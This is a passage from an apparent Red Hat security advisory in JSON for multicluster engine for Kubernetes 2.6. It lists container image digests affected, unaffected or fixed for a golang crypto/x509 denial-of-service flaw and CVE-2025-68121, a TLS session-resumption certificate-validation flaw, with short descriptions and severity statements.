2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"}, {"cve": "CVE-2025-68121", "discovery_date": "2026-02-05T18:01:30.086058+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:e05c6ff6a481e7956a58e07f10dc15470ef2af82966b2159260077bd6ba06cf7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:4bef3dab9db981249b3a1b3a556e615226b29fdc7a6593a3970921799817129f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:901dd1ad148b84d3c1bcfa71beeaf75b836bb382bf99893f65d4629d006bcfc7_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:abdca0cc6776dba16be873853e38bc62bb9d3f1eb80f1d4bcbe7829714a019b5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:f856447bc82e37dc4da78639ff08bc1f4b4c4e0d75c3d1eeec81e3807c65ad7e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:345d589cb55ccb8afb080f04054ebc30f0cf6383742ce750f4f5656e14f4db35_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5557594c1ac0b047fea659868fdf71b8f16e0548abe8f41bf58ce80924701a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:8e08974a6dc10be9cb7d7a07527e8960cd93b76506355ce900e2e691208d1047_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:9d501eb84c2b7f9f860c5bb08d9adcc599e42ed0c3a0e24af3c32b686f005182_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:8690fcbd38eeec0cde0edc5c2e46683837d6247ce657c495fc791a0bb13c0450_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b41036dc59ecfd530609349da9b73dec177184662aaf69bac35e67d245815d2a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:b5a7706fc69c7e1b3ad3ff03c5b0e46b44cd93ce332a74acd43da8c86b6b7163_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f0f363dc51f50bf822bff6b5f9072299c2404d8df1891243ae3ad6ba90c95f0a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:212c9c73fd1050e3f202703e7c5c5a466d1931d918e3f730d2c56bb2629337e2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:c6b10fd7009685d032e8c914cce4a1b2630ab99f2262fddd6dd32c048224e535_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d26e9fe1bf09eb1c025e28c795debabe0dda6a3f0fa112a6507b8862489de361_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:e246eb1fb572fe7ad7058afd783020e77dd61699a5ffd290000e80baa6bc0454_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:c3754441d1af76c226983b48c57b537856da6cc21272008c05dfbb8e860d25f6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:deacb2138fe3d8a8d9ddebbbc257b4ea5be376c26df0e46a276c631752ca8a16_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:e7f321893f0f76fcf0e83225502e1367752c24c449a44810ccbed08ee3af3efb_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:f33966f40e46d3815d0a8859b4fa802e48931ba8f95957c31c9d728f6ae42340_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4b4a1fda57434c75499094003457759ec6d530ec8fcfc08c8e0c86fb6f33c68f_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:93eb3a376b3d3a878d104d8af966b8deaed7b26ceaf16bf337d70687e0e5fa17_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:c7f96198522ecf44c19fe190d603d94387b3a522e3210826c6c08c0999aabc56_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:da99e0676f28200a08e4996adb0d107713fd11f747df5abb8b58fbc95bcab827_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:43f0b3b75610ab9d19d261854e390dc01bf64777cce43a1076375b1580452908_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:583bf219ded8c4f21a696daa081720f3eb81c3676e0182fd246e6d4f1d3fb2f7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:76a5e7db276463588b6a98c27fb8a24a8f85b73eef2fd4742b72690fa92decc3_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8efc263d78912f66ee98a3717a8cefdeb6e6b87bd8f3788d4f3712d9000d031c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:32a81668f5cac70ec36ffc3caa97a4239d1840004afc8df2418e79bbbbf7c88d_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:394ac878a493ffd61692942614165e69acbdaaa37b1f9a460996dc52d8586b82_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:ba480c9b472e0746645bcebdd6ed5559b611d410d521637a9e7092ee925af91d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d564b6f6d156280a08c0f3585673a11c4a72acc74626b5780bb39b7141170a19_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:1f68b9c88d343654c87334fbc3b5c42338406b727da3c6bbf3b14fbef236b93a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:2eb31f9a7694f4b8690e168c0d8fcd0da42642ca87508e5199e4310fc56ea232_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:a1a514fcf09eda92d948a4375a599fcd45189a36a8748a2cf499a0fd12a7cb52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:edc942a663b791725f358fcef40fe2de8ad55f8f81d7ac2ff239ccefbb24ea3c_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:221cce833cfe679a7ed2674f39ed6aae065939119702188811507cf7b672996c_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:bcb17131e9d74ac42ddcb1baf13c2697a72c07dd386b871032c34144be5d9647_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d55c640d3df3705e8a861e7034f450d1c7bb5726251ba0384fd28b40bb178595_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:e006a8a7d0dc166885ba2a5f573128938ee6d56c882a71b68845b97e483d6e32_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5c4384e6f2589dedfbb0942b40187a93581b07a724ec2a84189af4f617e9416b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:5f68fd93ae28391c01fe0a44829f12494544b59c330a2902a6edaad45c7b02b3_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b6f4af9508e1a5a312c274aa19fa280970d462e16857394d843c53358ee318c2_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:b9d178326c5f78df593cad595dd3b8a1329187d9f8d021201df726206b70bc49_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:2d23f9d25ffe94fbb9e794a61690cf08ac2888b053efc194c9abdcdeaea8fee5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:3fbf4c46f032eb961dc7f519f38cd93e49839ac94761e6f43de0e648d75c241a_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:4196cd9623f2102f364c0662c6c6092efb19b2dba7bb60d0b156a12dccef9949_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:aaade5f90a49e8b49ccb8cc1fd74485ba78a37cab222676e2495500e95a911e6_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:07eaddc3666472876e1470d7d5bc49f28bce4176efbed07214d1284a785bc1de_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:0afadb8cc20a5a4a55a9762159ccd08de9c79abd5cd915f620eaedcae97e1dda_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:79cb2e32b2711d9986e53977c8757b2564ae3dc2cb82076adae43aeb61bc1499_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:bb24ce270fa3812316ec61cc7b5bf138ed54608e326d5ee783e040ca04b30c6e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:df9600893f99f149e15fb4a0295ed978d0cc35141a67a3a9824d339a5e13e08f_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2437111"}], "notes": [{"category": "description", "text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.", "title": "Vulnerability description"}, {"category": "summary", "text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption", "title": "Vulnerability summary"}, {"category": "other", "text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:27bb82aa0a0d0506fa45908892e379e4bf8190ee9512483c7d7b6a001eb37c09_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4e8e3b7a8a317dda2ec47a53110467177015d9cec39ee64b819a133048ee06f2_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9df56b21394d9b17bf70d49a367c004c4f76111bbcd0ae2046871631a914a5a4_amd64", "multicluster engine for Kubernetes 